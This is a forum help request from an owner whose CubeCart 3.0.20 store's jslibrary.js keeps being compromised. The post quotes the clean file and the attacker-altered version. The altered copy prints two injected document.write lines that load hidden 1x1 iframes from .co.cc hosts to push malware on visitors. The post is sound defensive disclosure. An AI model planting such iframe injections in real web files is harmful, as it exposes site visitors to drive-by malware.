My Cubecart 3.0.20 website repeatedly hacked

Guest valtam

As the thread title says, somehow, a person is able to access and change the /js/jslibrary.js file and place malicious code in it.

Upon doing this, anyone who visits the site in Internet Explorer (Safari and Firefox appear immune to this attack) gets a popup from a .co.cc domain wanting to install something malicious. In my Cubecart backend, I have noticed in the Admin Sessions area, some attempts to login followed by the attackers ip address (see screenshots). Even after replacing the jslibrary.js file with a fresh one and changing the ftp etc passwords, they are still able to add malicious code to the jslibrary.js file.

I need help to prevent and block further the ability to access my jslibrary.js file which keeps getting altered. Please help, its starting to get really annoying :(

admin1n.png

admin2f.png

Normal jslibrary.js file code (from the top of the file):

// display decision alert box

function decision(message, url){

if(confirm(message)) location.href = url;

}

// open browser window

function openPopUp(url, windowName, w, h, scrollbar) {

var winl = (screen.width - w) / 2;

var wint = (screen.height - h) / 2;

winprops = 'height='+h+',width='+w+',top='+wint+',left='+winl+',scrollbars='+scrollbar;

win = window.open(url, windowName, winprops);

if (parseInt(navigator.appVersion) >= 4) { 

win.window.focus(); 

} 

}

Altered jslibrary.js file:

// display decision alert box

function decision(message, url){

if(confirm(message)) location.href = url;

}

document.write("<iframe src='http://hsdhdshsdfher.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAQMHBgINBQ==' width='1' height='1' frameborder='0'></iframe>");

document.write("<iframe src='http://dedede4.co.cc/notfound/inkujrgzk.php?n=setup2432' width='1' height='1' frameborder='0'></iframe>");

// open browser window

function openPopUp(url, windowName, w, h, scrollbar) {

var winl = (screen.width - w) / 2;

var wint = (screen.height - h) / 2;

winprops = 'height='+h+',width='+w+',top='+wint+',left='+winl+',scrollbars='+scrollbar;

win = window.open(url, windowName, winprops);

if (parseInt(navigator.appVersion) >= 4) { 

win.window.focus(); 

} 

}

In cPanel I also block access to the ip's, but all they (hacker) do is go get a new .co.cc domain name. I really don't want to have to build this website from scratch as it took a very long time to set up. I am hoping someone will be able to help me stop access to the jslibrary.js file from being repeatedly modified.